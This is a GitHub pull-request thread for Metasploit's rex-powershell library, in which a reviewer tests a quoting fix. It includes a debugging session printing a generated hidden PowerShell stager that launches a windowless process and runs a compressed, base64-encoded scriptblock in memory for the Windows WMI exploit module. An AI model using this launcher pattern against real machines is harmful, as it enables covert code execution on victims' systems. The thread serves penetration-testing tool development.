rapid7 / rex-powershell

Rex library for dealing with Powershell Scripts

Update use_single_quotes straggler #18

Closed wvu closed 5 years ago

wvu commented 5 years ago

Untested.

https://github.com/rapid7/metasploit-framework/pull/11660

pbarry-r7 commented 5 years ago

I tested with the modules in rapid7/metasploit-framework#11660, using binding.pry just before line 348 of the modified file so I can run the run_hidden_psh() method manually (first with the updated wrap_double_quotes option, then I delete that option and add the use_single_quotes option to see the existing behavior). I've included the output for one of those modules below; the output for the other 3 looked fine as well.

exploits/windows/local/wmi

[1] pry(Rex::Powershell::Command)> p inner_args
{:remove_comspec=>true, :encode_final_payload=>true, :persist=>false, :prepend_sleep=>nil, :exec_in_place=>false, :encode_inner_payload=>false, :noninteractive=>true, :wrap_double_quotes=>true, :no_equals=>false, :method=>"reflection", :shorten=>true}
=> {:remove_comspec=>true,
 :encode_final_payload=>true,
 :persist=>false,
 :prepend_sleep=>nil,
 :exec_in_place=>false,
 :encode_inner_payload=>false,
 :noninteractive=>true,
 :wrap_double_quotes=>true,
 :no_equals=>false,
 :method=>"reflection",
 :shorten=>true}
[2] pry(Rex::Powershell::Command)> p encoded
false
=> false
[3] pry(Rex::Powershell::Command)> run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)
=> "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[4] pry(Rex::Powershell::Command)> inner_args.delete(:wrap_double_quotes)
=> false
[5] pry(Rex::Powershell::Command)> inner_args[:use_single_quotes]=true
=> true
[6] pry(Rex::Powershell::Command)> p inner_args
{:remove_comspec=>true, :encode_final_payload=>true, :persist=>false, :prepend_sleep=>nil, :exec_in_place=>false, :encode_inner_payload=>false, :noninteractive=>true, :no_equals=>false, :method=>"reflection", :shorten=>true, :noprofile=>"true", :windowstyle=>"hidden", :command=>"&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", :use_single_quotes=>true}
=> {:remove_comspec=>true,
 :encode_final_payload=>true,
 :persist=>false,
 :prepend_sleep=>nil,
 :exec_in_place=>false,
 :encode_inner_payload=>false,
 :noninteractive=>true,
 :no_equals=>false,
 :method=>"reflection",
 :shorten=>true,
 :noprofile=>"true",
 :windowstyle=>"hidden",
 :command=>
  "&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",
 :use_single_quotes=>true}
[7] pry(Rex::Powershell::Command)> run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)
=> "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

pbarry-r7 commented 5 years ago

Welp, landed this without the usual 'Land #XXX' because I'm an idiot and fingers did the wrong thing... :/ But it's landed!